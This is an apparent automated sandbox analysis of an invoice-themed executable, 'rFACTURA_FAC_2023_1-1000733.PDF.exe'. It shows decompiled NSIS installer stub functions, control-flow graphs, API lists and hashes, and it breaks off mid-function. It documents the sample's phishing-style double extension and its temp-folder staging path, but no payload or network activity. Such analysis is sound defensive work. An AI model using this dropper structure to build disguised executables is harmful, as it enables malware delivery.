                                                                                                  control_flow_graph 295 40396d-403985 call 406639 298 403987-403997 call 4061a6 295->298 299 403999-4039d0 call 40612d 295->299 308 4039f3-403a1c call 403c43 call 405c38 298->308 304 4039d2-4039e3 call 40612d 299->304 305 4039e8-4039ee lstrcatW 299->305 304->305 305->308 313 403a22-403a27 308->313 314 403aae-403ab6 call 405c38 308->314 313->314 315 403a2d-403a55 call 40612d 313->315 320 403ac4-403ae9 LoadImageW 314->320 321 403ab8-403abf call 406281 314->321 315->314 322 403a57-403a5b 315->322 324 403b6a-403b72 call 40140b 320->324 325 403aeb-403b1b RegisterClassW 320->325 321->320 326 403a6d-403a79 lstrlenW 322->326 327 403a5d-403a6a call 405b5d 322->327 336 403b74-403b77 324->336 337 403b7c-403b87 call 403c43 324->337 328 403b21-403b65 SystemParametersInfoW CreateWindowExW 325->328 329 403c39 325->329 334 403aa1-403aa9 call 405b30 call 40625f 326->334 335 403a7b-403a89 lstrcmpiW 326->335 327->326 328->324 333 403c3b-403c42 329->333 334->314 335->334 340 403a8b-403a95 GetFileAttributesW 335->340 336->333 348 403c10-403c11 call 405396 337->348 349 403b8d-403ba7 ShowWindow call 4065c9 337->349 343 403a97-403a99 340->343 344 403a9b-403a9c call 405b7c 340->344 343->334 343->344 344->334 352 403c16-403c18 348->352 356 403bb3-403bc5 GetClassInfoW 349->356 357 403ba9-403bae call 4065c9 349->357 354 403c32-403c34 call 40140b 352->354 355 403c1a-403c20 352->355 354->329 355->336 358 403c26-403c2d call 40140b 355->358 361 403bc7-403bd7 GetClassInfoW RegisterClassW 356->361 362 403bdd-403c00 DialogBoxParamW call 40140b 356->362 357->356 358->336 361->362 366 403c05-403c0e call 4038bd 362->366 366->333
                                                                                                  C-Code - Quality: 96%
                                                                                                  			E0040396D(void* __eflags) {
                                                                                                  				intOrPtr _v4;
                                                                                                  				intOrPtr _v8;
                                                                                                  				int _v12;
                                                                                                  				void _v16;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t22;
                                                                                                  				void* _t30;
                                                                                                  				void* _t32;
                                                                                                  				int _t33;
                                                                                                  				void* _t36;
                                                                                                  				int _t39;
                                                                                                  				int _t40;
                                                                                                  				intOrPtr _t41;
                                                                                                  				int _t44;
                                                                                                  				short _t63;
                                                                                                  				WCHAR* _t65;
                                                                                                  				signed char _t69;
                                                                                                  				WCHAR* _t76;
                                                                                                  				intOrPtr _t82;
                                                                                                  				WCHAR* _t87;
                                                                                                  
                                                                                                  				_t82 =  *0x7a8a34;
                                                                                                  				_t22 = E00406639(2);
                                                                                                  				_t90 = _t22;
                                                                                                  				if(_t22 == 0) {
                                                                                                  					_t76 = 0x7a1f20;
                                                                                                  					L"1033" = 0x30;
                                                                                                  					 *0x7b5002 = 0x78;
                                                                                                  					 *0x7b5004 = 0;
                                                                                                  					E0040612D(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f20, 0);
                                                                                                  					__eflags =  *0x7a1f20;
                                                                                                  					if(__eflags == 0) {
                                                                                                  						E0040612D(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x7a1f20, 0);
                                                                                                  					}
                                                                                                  					lstrcatW(L"1033", _t76);
                                                                                                  				} else {
                                                                                                  					E004061A6(L"1033",  *_t22() & 0x0000ffff);
                                                                                                  				}
                                                                                                  				E00403C43(_t78, _t90);
                                                                                                  				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated";
                                                                                                  				 *0x7a8ac0 =  *0x7a8a3c & 0x00000020;
                                                                                                  				 *0x7a8adc = 0x10000;
                                                                                                  				if(E00405C38(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated") != 0) {
                                                                                                  					L16:
                                                                                                  					if(E00405C38(_t98, _t86) == 0) {
                                                                                                  						E00406281(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                                  					}
                                                                                                  					_t30 = LoadImageW( *0x7a8a20, 0x67, "true", 0, 0, 0x8040); // executed
                                                                                                  					 *0x7a7a08 = _t30;
                                                                                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                  						L21:
                                                                                                  						if(E0040140B(0) == 0) {
                                                                                                  							_t32 = E00403C43(_t78, __eflags);
                                                                                                  							__eflags =  *0x7a8ae0;
                                                                                                  							if( *0x7a8ae0 != 0) {
                                                                                                  								_t33 = E00405396(_t32, 0);
                                                                                                  								__eflags = _t33;
                                                                                                  								if(_t33 == 0) {
                                                                                                  									E0040140B("true");
                                                                                                  									goto L33;
                                                                                                  								}
                                                                                                  								__eflags =  *0x7a79ec; // 0x0
                                                                                                  								if(__eflags == 0) {
                                                                                                  									E0040140B(2);
                                                                                                  								}
                                                                                                  								goto L22;
                                                                                                  							}
                                                                                                  							ShowWindow( *0x7a1f00, 5); // executed
                                                                                                  							_t39 = E004065C9("RichEd20"); // executed
                                                                                                  							__eflags = _t39;
                                                                                                  							if(_t39 == 0) {
                                                                                                  								E004065C9("RichEd32");
                                                                                                  							}
                                                                                                  							_t87 = L"RichEdit20W";
                                                                                                  							_t40 = GetClassInfoW(0, _t87, 0x7a79c0);
                                                                                                  							__eflags = _t40;
                                                                                                  							if(_t40 == 0) {
                                                                                                  								GetClassInfoW(0, L"RichEdit", 0x7a79c0);
                                                                                                  								 *0x7a79e4 = _t87;
                                                                                                  								RegisterClassW(0x7a79c0);
                                                                                                  							}
                                                                                                  							_t41 =  *0x7a7a00; // 0x0
                                                                                                  							_t44 = DialogBoxParamW( *0x7a8a20, _t41 + 0x00000069 & 0x0000ffff, 0, E00403D1B, 0); // executed
                                                                                                  							E004038BD(E0040140B(5), "true");
                                                                                                  							return _t44;
                                                                                                  						}
                                                                                                  						L22:
                                                                                                  						_t36 = 2;
                                                                                                  						return _t36;
                                                                                                  					} else {
                                                                                                  						_t78 =  *0x7a8a20;
                                                                                                  						 *0x7a79c4 = E00401000;
                                                                                                  						 *0x7a79d0 =  *0x7a8a20;
                                                                                                  						 *0x7a79d4 = _t30;
                                                                                                  						 *0x7a79e4 = 0x40a380;
                                                                                                  						if(RegisterClassW(0x7a79c0) == 0) {
                                                                                                  							L33:
                                                                                                  							__eflags = 0;
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                  						 *0x7a1f00 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a20, 0);
                                                                                                  						goto L21;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t78 =  *(_t82 + 0x48);
                                                                                                  					_t92 = _t78;
                                                                                                  					if(_t78 == 0) {
                                                                                                  						goto L16;
                                                                                                  					}
                                                                                                  					_t76 = 0x7a69c0;
                                                                                                  					E0040612D(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69c0, 0);
                                                                                                  					_t63 =  *0x7a69c0; // 0x43
                                                                                                  					if(_t63 == 0) {
                                                                                                  						goto L16;
                                                                                                  					}
                                                                                                  					if(_t63 == 0x22) {
                                                                                                  						_t76 = 0x7a69c2;
                                                                                                  						 *((short*)(E00405B5D(0x7a69c2, 0x22))) = 0;
                                                                                                  					}
                                                                                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                  						L15:
                                                                                                  						E0040625F(_t86, E00405B30(_t76));
                                                                                                  						goto L16;
                                                                                                  					} else {
                                                                                                  						_t69 = GetFileAttributesW(_t76);
                                                                                                  						if(_t69 == 0xffffffff) {
                                                                                                  							L14:
                                                                                                  							E00405B7C(_t76);
                                                                                                  							goto L15;
                                                                                                  						}
                                                                                                  						_t98 = _t69 & 0x00000010;
                                                                                                  						if((_t69 & 0x00000010) != 0) {
                                                                                                  							goto L15;
                                                                                                  						}
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}


























                                                                                                  APIs
                                                                                                    • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                                                                    • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                  • lstrcatW.KERNEL32(1033,007A1F20), ref: 004039EE
                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
                                                                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated), ref: 00403AD5
                                                                                                    • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                                                                                  • RegisterClassW.USER32(007A79C0), ref: 00403B12
                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B95
                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
                                                                                                  • RegisterClassW.USER32(007A79C0), ref: 00403BD7
                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                  • API String ID: 1975747703-1264306497
                                                                                                  • Opcode ID: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
                                                                                                  • Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
                                                                                                  • Opcode Fuzzy Hash: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
                                                                                                  • Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d51 372 402f11-402f16 369->372 373 402f1b-402f49 call 40625f call 405b7c call 40625f GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032f2 384->387 386->387 396 4030a0-4030a8 call 402e5d 387->396 397 402f7e-402f85 387->397 391 40304b-403063 call 403308 call 4032f2 388->391 392 40306d-403097 GlobalAlloc call 403308 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 418 4030aa-4030bb 392->418 396->389 401 403001-403005 397->401 402 402f87-402f9b call 405d0c 397->402 407 403007-40300e call 402e5d 401->407 408 40300f-403015 401->408 402->408 416 402f9d-402fa4 402->416 407->408 409 403024-40302e 408->409 410 403017-403021 call 40672c 408->410 409->384 417 403034 409->417 410->409 416->408 422 402fa6-402fad 416->422 417->381 423 4030c3-4030c8 418->423 424 4030bd 418->424 419->389 419->392 422->408 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->408 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405d0c 426->428 427->408 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->408 435 402ffd-402fff 433->435 434->417 434->433 435->408
                                                                                                  C-Code - Quality: 80%
                                                                                                  			E00402EC1(void* __eflags, signed int _a4) {
                                                                                                  				DWORD* _v8;
                                                                                                  				DWORD* _v12;
                                                                                                  				void* _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				long _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				intOrPtr _v40;
                                                                                                  				signed int _v44;
                                                                                                  				long _t43;
                                                                                                  				signed int _t50;
                                                                                                  				void* _t53;
                                                                                                  				void* _t57;
                                                                                                  				intOrPtr* _t59;
                                                                                                  				long _t60;
                                                                                                  				signed int _t65;
                                                                                                  				signed int _t70;
                                                                                                  				signed int _t71;
                                                                                                  				signed int _t77;
                                                                                                  				intOrPtr _t80;
                                                                                                  				long _t82;
                                                                                                  				signed int _t85;
                                                                                                  				signed int _t87;
                                                                                                  				void* _t89;
                                                                                                  				signed int _t90;
                                                                                                  				signed int _t93;
                                                                                                  				void* _t94;
                                                                                                  
                                                                                                  				_t82 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				_v8 = 0;
                                                                                                  				_t43 = GetTickCount();
                                                                                                  				_t91 = L"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe";
                                                                                                  				 *0x7a8a30 = _t43 + 0x3e8;
                                                                                                  				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe", 0x400);
                                                                                                  				_t89 = E00405D51(_t91, 0x80000000, 3);
                                                                                                  				_v16 = _t89;
                                                                                                  				 *0x40a018 = _t89;
                                                                                                  				if(_t89 == 0xffffffff) {
                                                                                                  					return L"Error launching installer";
                                                                                                  				}
                                                                                                  				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                  				E0040625F(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                                                  				E0040625F(0x7b7000, E00405B7C(_t92));
                                                                                                  				_t50 = GetFileSize(_t89, 0);
                                                                                                  				__eflags = _t50;
                                                                                                  				 *0x7976dc = _t50;
                                                                                                  				_t93 = _t50;
                                                                                                  				if(_t50 <= 0) {
                                                                                                  					L24:
                                                                                                  					E00402E5D("true");
                                                                                                  					__eflags =  *0x7a8a38 - _t82;
                                                                                                  					if( *0x7a8a38 == _t82) {
                                                                                                  						goto L29;
                                                                                                  					}
                                                                                                  					__eflags = _v8 - _t82;
                                                                                                  					if(_v8 == _t82) {
                                                                                                  						L28:
                                                                                                  						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                                  						_t94 = _t53;
                                                                                                  						E00403308( *0x7a8a38 + 0x1c);
                                                                                                  						_push(_v24);
                                                                                                  						_push(_t94);
                                                                                                  						_push(_t82);
                                                                                                  						_push(0xffffffff); // executed
                                                                                                  						_t57 = E004030FA(); // executed
                                                                                                  						__eflags = _t57 - _v24;
                                                                                                  						if(_t57 == _v24) {
                                                                                                  							__eflags = _v44 & 0x00000001;
                                                                                                  							 *0x7a8a34 = _t94;
                                                                                                  							 *0x7a8a3c =  *_t94;
                                                                                                  							if((_v44 & 0x00000001) != 0) {
                                                                                                  								 *0x7a8a40 =  *0x7a8a40 + 1;
                                                                                                  								__eflags =  *0x7a8a40;
                                                                                                  							}
                                                                                                  							_t40 = _t94 + 0x44; // 0x44
                                                                                                  							_t59 = _t40;
                                                                                                  							_t85 = 8;
                                                                                                  							do {
                                                                                                  								_t59 = _t59 - 8;
                                                                                                  								 *_t59 =  *_t59 + _t94;
                                                                                                  								_t85 = _t85 - 1;
                                                                                                  								__eflags = _t85;
                                                                                                  							} while (_t85 != 0);
                                                                                                  							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
                                                                                                  							 *(_t94 + 0x3c) = _t60;
                                                                                                  							E00405D0C(0x7a8a60, _t94 + 4, 0x40);
                                                                                                  							__eflags = 0;
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  						goto L29;
                                                                                                  					}
                                                                                                  					E00403308( *0x78b6d4);
                                                                                                  					_t65 = E004032F2( &_a4, "true");
                                                                                                  					__eflags = _t65;
                                                                                                  					if(_t65 == 0) {
                                                                                                  						goto L29;
                                                                                                  					}
                                                                                                  					__eflags = _v12 - _a4;
                                                                                                  					if(_v12 != _a4) {
                                                                                                  						goto L29;
                                                                                                  					}
                                                                                                  					goto L28;
                                                                                                  				} else {
                                                                                                  					do {
                                                                                                  						_t90 = _t93;
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						_t70 = ( ~( *0x7a8a38) & 0x00007e00) + 0x200;
                                                                                                  						__eflags = _t93 - _t70;
                                                                                                  						if(_t93 >= _t70) {
                                                                                                  							_t90 = _t70;
                                                                                                  						}
                                                                                                  						_t71 = E004032F2(0x7976e0, _t90);
                                                                                                  						__eflags = _t71;
                                                                                                  						if(_t71 == 0) {
                                                                                                  							E00402E5D("true");
                                                                                                  							L29:
                                                                                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                  						}
                                                                                                  						__eflags =  *0x7a8a38;
                                                                                                  						if( *0x7a8a38 != 0) {
                                                                                                  							__eflags = _a4 & 0x00000002;
                                                                                                  							if((_a4 & 0x00000002) == 0) {
                                                                                                  								E00402E5D(0);
                                                                                                  							}
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						E00405D0C( &_v44, 0x7976e0, 0x1c);
                                                                                                  						_t77 = _v44;
                                                                                                  						__eflags = _t77 & 0xfffffff0;
                                                                                                  						if((_t77 & 0xfffffff0) != 0) {
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						__eflags = _v40 - 0xdeadbeef;
                                                                                                  						if(_v40 != 0xdeadbeef) {
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						__eflags = _v28 - 0x74736e49;
                                                                                                  						if(_v28 != 0x74736e49) {
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						__eflags = _v32 - 0x74666f73;
                                                                                                  						if(_v32 != 0x74666f73) {
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						__eflags = _v36 - 0x6c6c754e;
                                                                                                  						if(_v36 != 0x6c6c754e) {
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						_a4 = _a4 | _t77;
                                                                                                  						_t87 =  *0x78b6d4; // 0x674f5
                                                                                                  						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
                                                                                                  						_t80 = _v20;
                                                                                                  						__eflags = _t80 - _t93;
                                                                                                  						 *0x7a8a38 = _t87;
                                                                                                  						if(_t80 > _t93) {
                                                                                                  							goto L29;
                                                                                                  						}
                                                                                                  						__eflags = _a4 & 0x00000008;
                                                                                                  						if((_a4 & 0x00000008) != 0) {
                                                                                                  							L16:
                                                                                                  							_v8 = _v8 + 1;
                                                                                                  							_t24 = _t80 - 4; // 0x40a2dc
                                                                                                  							_t93 = _t24;
                                                                                                  							__eflags = _t90 - _t93;
                                                                                                  							if(_t90 > _t93) {
                                                                                                  								_t90 = _t93;
                                                                                                  							}
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						__eflags = _a4 & 0x00000004;
                                                                                                  						if((_a4 & 0x00000004) != 0) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						goto L16;
                                                                                                  						L20:
                                                                                                  						__eflags = _t93 -  *0x7976dc; // 0x69700
                                                                                                  						if(__eflags < 0) {
                                                                                                  							_v12 = E0040672C(_v12, 0x7976e0, _t90);
                                                                                                  						}
                                                                                                  						 *0x78b6d4 =  *0x78b6d4 + _t90;
                                                                                                  						_t93 = _t93 - _t90;
                                                                                                  						__eflags = _t93;
                                                                                                  					} while (_t93 > 0);
                                                                                                  					_t82 = 0;
                                                                                                  					__eflags = 0;
                                                                                                  					goto L24;
                                                                                                  				}
                                                                                                  			}































                                                                                                  0x00000000
                                                                                                  0x00402faf
                                                                                                  0x00402fb6
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402fb8
                                                                                                  0x00402fbf
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402fc1
                                                                                                  0x00402fc7
                                                                                                  0x00402fd0
                                                                                                  0x00402fd6
                                                                                                  0x00402fd9
                                                                                                  0x00402fdb
                                                                                                  0x00402fe1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402fe7
                                                                                                  0x00402feb
                                                                                                  0x00402ff3
                                                                                                  0x00402ff3
                                                                                                  0x00402ff6
                                                                                                  0x00402ff6
                                                                                                  0x00402ff9
                                                                                                  0x00402ffb
                                                                                                  0x00402ffd
                                                                                                  0x00402ffd
                                                                                                  0x00000000
                                                                                                  0x00402ffb
                                                                                                  0x00402fed
                                                                                                  0x00402ff1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040300f
                                                                                                  0x0040300f
                                                                                                  0x00403015
                                                                                                  0x00403021
                                                                                                  0x00403021
                                                                                                  0x00403024
                                                                                                  0x0040302a
                                                                                                  0x0040302c
                                                                                                  0x0040302c
                                                                                                  0x00403034
                                                                                                  0x00403034
                                                                                                  0x00000000
                                                                                                  0x00403034

                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402ED2
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                                    • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                                                                    • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                  • String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                  • API String ID: 4283519449-289341765
                                                                                                  • Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                                                                                  • Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
                                                                                                  • Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                                                                                  • Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E00406281(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				struct _ITEMIDLIST* _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed int _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed int _v28;
                                                                                                  				signed int _t43;
                                                                                                  				WCHAR* _t44;
                                                                                                  				signed char _t46;
                                                                                                  				signed int _t47;
                                                                                                  				signed int _t48;
                                                                                                  				short _t58;
                                                                                                  				short _t60;
                                                                                                  				short _t62;
                                                                                                  				void* _t70;
                                                                                                  				signed int _t76;
                                                                                                  				void* _t82;
                                                                                                  				signed char _t83;
                                                                                                  				short _t86;
                                                                                                  				intOrPtr _t94;
                                                                                                  				signed int _t96;
                                                                                                  				void* _t102;
                                                                                                  				short _t103;
                                                                                                  				signed int _t106;
                                                                                                  				signed int _t108;
                                                                                                  				void* _t109;
                                                                                                  				WCHAR* _t110;
                                                                                                  				void* _t112;
                                                                                                  
                                                                                                  				_t109 = __esi;
                                                                                                  				_t102 = __edi;
                                                                                                  				_t70 = __ebx;
                                                                                                  				_t43 = _a8;
                                                                                                  				if(_t43 < 0) {
                                                                                                  					_t94 =  *0x7a79fc; // 0xb8007e
                                                                                                  					_t43 =  *(_t94 - 4 + _t43 * 4);
                                                                                                  				}
                                                                                                  				_push(_t70);
                                                                                                  				_push(_t109);
                                                                                                  				_push(_t102);
                                                                                                  				_t96 =  *0x7a8a78 + _t43 * 2;
                                                                                                  				_t44 = 0x7a69c0;
                                                                                                  				_t110 = 0x7a69c0;
                                                                                                  				if(_a4 >= 0x7a69c0 && _a4 - 0x7a69c0 >> 1 < 0x800) {
                                                                                                  					_t110 = _a4;
                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                  				}
                                                                                                  				while(1) {
                                                                                                  					_t103 =  *_t96;
                                                                                                  					if(_t103 == 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                                                  					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_t82 = 2;
                                                                                                  					_t96 = _t96 + _t82;
                                                                                                  					__eflags = _t103 - 4;
                                                                                                  					_a8 = _t96;
                                                                                                  					if(__eflags >= 0) {
                                                                                                  						if(__eflags != 0) {
                                                                                                  							 *_t110 = _t103;
                                                                                                  							_t110 = _t110 + _t82;
                                                                                                  							__eflags = _t110;
                                                                                                  						} else {
                                                                                                  							 *_t110 =  *_t96;
                                                                                                  							_t110 = _t110 + _t82;
                                                                                                  							_t96 = _t96 + _t82;
                                                                                                  						}
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                                                  					_t46 =  *_t96;
                                                                                                  					_t47 = _t46 & 0x000000ff;
                                                                                                  					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                                                  					_a8 = _a8 + 2;
                                                                                                  					_v28 = _t47 | 0x00008000;
                                                                                                  					_v24 = _t47;
                                                                                                  					_t76 = _t83 & 0x000000ff;
                                                                                                  					_v16 = _t76;
                                                                                                  					__eflags = _t103 - 2;
                                                                                                  					_v20 = _t76 | 0x00008000;
                                                                                                  					if(_t103 != 2) {
                                                                                                  						__eflags = _t103 - 3;
                                                                                                  						if(_t103 != 3) {
                                                                                                  							__eflags = _t103 - 1;
                                                                                                  							if(_t103 == 1) {
                                                                                                  								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                                                  								E00406281(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                                                  							}
                                                                                                  							L43:
                                                                                                  							_t48 = lstrlenW(_t110);
                                                                                                  							_t96 = _a8;
                                                                                                  							_t110 =  &(_t110[_t48]);
                                                                                                  							_t44 = 0x7a69c0;
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						_t106 = _v8;
                                                                                                  						__eflags = _t106 - 0x1d;
                                                                                                  						if(_t106 != 0x1d) {
                                                                                                  							__eflags = (_t106 << 0xb) + 0x7a9000;
                                                                                                  							E0040625F(_t110, (_t106 << 0xb) + 0x7a9000);
                                                                                                  						} else {
                                                                                                  							E004061A6(_t110,  *0x7a8a28);
                                                                                                  						}
                                                                                                  						__eflags = _t106 + 0xffffffeb - 7;
                                                                                                  						if(_t106 + 0xffffffeb < 7) {
                                                                                                  							L34:
                                                                                                  							E004064F3(_t110);
                                                                                                  						}
